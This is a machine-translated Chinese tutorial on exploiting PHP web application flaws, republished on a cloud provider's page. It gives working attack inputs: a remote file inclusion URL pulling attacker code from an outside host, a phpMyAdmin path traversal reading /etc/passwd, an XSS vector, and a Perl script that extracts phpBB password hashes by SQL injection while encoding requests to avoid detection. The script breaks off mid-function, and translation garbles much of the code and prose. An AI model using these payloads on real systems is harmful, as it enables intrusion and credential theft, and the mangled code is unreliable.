PHP page Vulnerability analysis and related problem solving _php tutorial

Source: Internet
Author: User
Tags md5 hash
From the current network security, we are most concerned about and contact the most Web page vulnerability should be ASP, in this regard, small bamboo is an expert, I have no say. However, in terms of PHP, there are also serious security problems, but there are few articles in this area. Here, I would like to discuss with you a little bit about the vulnerability of PHP page.

I made a summary of the current common PHP vulnerabilities, broadly divided into the following: Include file vulnerability, script command execution vulnerability, file Disclosure Vulnerability, SQL injection vulnerability and several other. Of course, some of the generic technologies, such as cookie spoofing, are not discussed here, and there are many online. So, let's take a look at how to exploit these vulnerabilities.

First, let's discuss the include file vulnerability. This loophole should be said to be PHP alone. This is due to insufficient processing of externally supplied malicious data, which could allow remote attackers to execute arbitrary commands on the system with Web process privileges. Let's look at an example: suppose there's a code in a.php that says:

The following is a reference fragment:

Include ($include. " /xxx.php ");

?>

In this code, $include is generally a set of paths, but we can construct a path ourselves to achieve the purpose of the attack. Let's say we commit: a.php?include=http://web/b.php, this web is the space we use to attack, of course, b.php is the code we used to attack. We can write code similar to: PassThru ("/bin/ls/etc") in b.php. In this way, you can perform some purposeful attacks. (Note: The Web server should not be able to execute PHP code, otherwise there is a problem.) For more information, see < <如何对php程序中的常见漏洞进行攻击> >). In this loophole, a lot of situation, for example: PayPal Store front,hotnews,mambo Open source,phpdig,yabb Se,phpbb,invisionboard,solmetra Spaw Editor,les Visiteurs,phpgedview,x-cart Wait a few.

Next, let's look at the script command execution vulnerability. This is due to the lack of sufficient filtering of the URI parameters submitted by the user, the submission of data containing malicious HTML code, which can lead to the triggering of cross-site scripting attacks, potentially obtaining sensitive information from the target user. We also give an example: php php transparent php 4.3.1 The following version of the index.php page for phpsessid lack of sufficient filtering, we can use this code to achieve the purpose of the attack: http://web/index.php ? Phpsessid= "> in script we can construct functions to get some sensitive information from the user. In this loophole relatively less, in addition to PHP transparent: php-nuke,phpbb,php classifieds,phpix,ultimate PHP Board and so on.

Then we'll look at the file Disclosure vulnerability, which is due to the lack of sufficient filtering of user-submitted parameters, which a remote attacker can use to perform directory traversal attacks and obtain sensitive information. Let's take the example of the phpmyadmin we found recently. In phpMyAdmin, the export.php page does not adequately filter the ' What ' parameters submitted by the user, and the remote attacker commits to include multiple '. /' character data, you can bypass the Web root limit and view any file information on the system with Web permissions. For example, to enter such an address: export.php?what=. /.. /.. /.. /.. /.. /etc/passwd%00 will be able to achieve the purpose of file leaks. In this respect a little more, there are: Myphpnuke,mcnews and so on.

Finally, we have to go back to the most exciting place again. Think of our usual in the ASP page with SQL injection is how cool, before the manual injection, until the small bamboo realized "SQL injection dense Gupta" (hehe), and then open to make NBSI after, we NB Alliance really pull out of the sky. Has helped csdn, tycoon Forum, China Channel and other large sites to find loopholes. (The nonsense is not much to say, a little off-topic ...).

or the word regulation Dhamma, in fact, in the ASP SQL injection and SQL injection in PHP is roughly the same, just a little attention to the use of several functions just fine. Change ASC to Ascii,len to length, and the other functions are basically the same. In fact, we see the SQL injection of PHP, is not all think of Php-nuke and phpbb it? Good, as the saying goes tree big recruit points, such as the Forum in the ASP community such as the Web is the loophole this king, this is not to say that its forum security is too bad, but fame too loud, others use more, research people also more, The more security vulnerabilities are found. phpBB is the same, now a large part of the people use PHP to do the forum, the general choice is phpBB. Its loophole is also always out, from the earliest phpbb.com PhpBB 1.4. The 0 version was discovered by a vulnerability, to the recent PhpBB 2.0.6 version of groupcp.php, as well as previously discovered search.php,profile.php, Viewtopic.php and so on add up, probably also have 10 a dozen appearance. This also has been caused, some people in the study of PHP loopholes will take it to do experimental products, so-called hundred practice into fine, believe that the future will be better phpbb.

Well, let's try to analyze the cause of the vulnerability. Take viewtopic.php page, because when call viewtopic.php, get "topic_id" directly from Get request and pass to SQL query command, and do not do some filtering processing, An attacker could submit a special SQL string for obtaining the MD5 password, which could be used for automatic login or brute force. (I don't think anyone would want to go to brute force, unless it's a particularly important reason). First look at the relevant source code:

The following is a reference fragment:

# if (isset ($HTTP _get_vars[post_topic_url))

#   {

# $topic _id=intval ($HTTP _get_vars[post_topic_url]);

#   }

# ElseIf (isset ($HTTP _get_vars[' topic '))

#   {

# $topic _id=intval ($HTTP _get_vars[' topic ');

#   }

From the above we can see that if the submitted View=newest and SID set the value, the execution of the query code like this (if you have not seen the PhpBB source code, it is recommended that you look at the point of view, the affected system is: PhpBB 2.0.5 and PhpBB 2.0.4).

The following is a reference fragment:

# $sql = "Select p.post_id

# from ". Posts_table. "P,". Sessions_table. "s,". Users_table. "U

# WHERE s.session_id = ' $session _id '

# and u.user_id = s.session_user_id

# and p.topic_id = $topic _id

# and P.post_time >= u.user_lastvisit

# ORDER by P.post_time ASC

# LIMIT 1 ";

Rick provides the following broken test code:

Use Io::socket;

$remote = Shift | | ' localhost ';

$view _topic = Shift | | '/phpbb2/viewtopic.php ';

$uid = Shift | | 2;

$port = 80;

$dBType = ' Mysql4 '; # Mysql4 or Pgsql

Print "Trying to get password hash for UID $uid server $remote dbtype: $dBType";

$p = "";

for ($index =1; $index <=32; $index + +)

{

$socket = io::socket::inet->new (peeraddr = $remote,

Peerport = $port,

Proto = "TCP",

Type = sock_stream)

Or die "couldnt connect to $remote: $port: $@";

$str = "GET $view _topic". "? Sid=1&topic_id=-1". Random_encode (Make_dbsql ()). "&view=newest". "http/1.0";

Print $socket $str;

Print $socket "cookie:phpbb2mysql_sid=1"; # Replace this for pgsql or remove it

Print $socket "Host: $remote";

while ($answer = < $socket >)

{

if ($answer =~/location:.*x23 (d+)/) # Matches the location:viewtopic.php?p= #

{

$p. = Chr ();

}

}

Close ($socket);

}

Print "MD5 Hash for uid $uid is $p";

# random encode str. helps avoid detection

Sub Random_encode

{

$STR = shift;

$ret = "";

for ($i =0; $i < p="">

{

$c = substr ($str, $i, 1);

$j = Rand Length ($str) * 1000;

  

  

if (int ($j)% 2 | | $c eq ")

{

$ret. = "%". sprintf ("%x", Ord ($c));

}


http://www.bkjia.com/PHPjc/446957.html www.bkjia.com true http://www.bkjia.com/PHPjc/446957.html techarticle from the current network security, we are most concerned about and contact the most Web page vulnerability should be ASP, in this regard, small bamboo is an expert, I have no say. However, in the context of PHP, also with ...

  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.